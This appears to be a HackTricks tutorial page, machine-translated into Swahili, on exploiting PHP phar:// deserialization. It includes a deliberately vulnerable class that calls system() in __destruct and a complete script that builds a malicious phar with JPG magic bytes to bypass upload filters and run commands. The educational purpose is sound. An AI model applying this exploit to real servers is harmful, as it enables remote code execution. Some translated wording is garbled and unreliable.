phar:// deserialization

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

Phar files (PHP Archive) files zina metadata katika muundo wa serialized, hivyo, wakati zinapochambuliwa, hii metadata inakuwa deserialized na unaweza kujaribu kutumia udhaifu wa deserialization ndani ya PHP code.

Jambo bora kuhusu sifa hii ni kwamba deserialization hii itatokea hata kwa kutumia kazi za PHP ambazo hazifanyi eval PHP code kama file_get_contents(), fopen(), file() au file_exists(), md5_file(), filemtime() au filesize().

Hivyo, fikiria hali ambapo unaweza kufanya PHP web ipate ukubwa wa faili isiyo na mipaka kwa kutumia phar:// protocol, na ndani ya code unapata class inayofanana na ifuatayo:

vunl.php

<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path

Unaweza kuunda faili la phar ambalo linapoload litafanya kudhulumu darasa hili ili kutekeleza amri zisizo na mipaka kwa kitu kama:

create_phar.php

<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

Kumbuka jinsi bajeti za kichawi za JPG (\xff\xd8\xff) zinavyoongezwa mwanzoni mwa faili la phar ili kupita vizuizi vya kupakia faili vinavyoweza. Tengeneza faili la test.phar kwa:

php --define phar.readonly=0 create_phar.php

Na kutekeleza amri ya whoami kwa kutumia nambari iliyo hatarini na:

php vuln.php

References

Nasaha ya bug bounty: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousFile Inclusion/Path traversal NextLFI2RCE via PHP Filters

Last updated 4 months ago

<?php class AnyClass { public $data = null; public function __construct($data) { $this->data = $data; } function __destruct() { system($this->data); } } filesize("phar://test.phar"); #The attacker can control this path

<?php class AnyClass { public $data = null; public function __construct($data) { $this->data = $data; } function __destruct() { system($this->data); } } // create new Phar $phar = new Phar('test.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>"); // add object of any class as meta data $object = new AnyClass('whoami'); $phar->setMetadata($object); $phar->stopBuffering();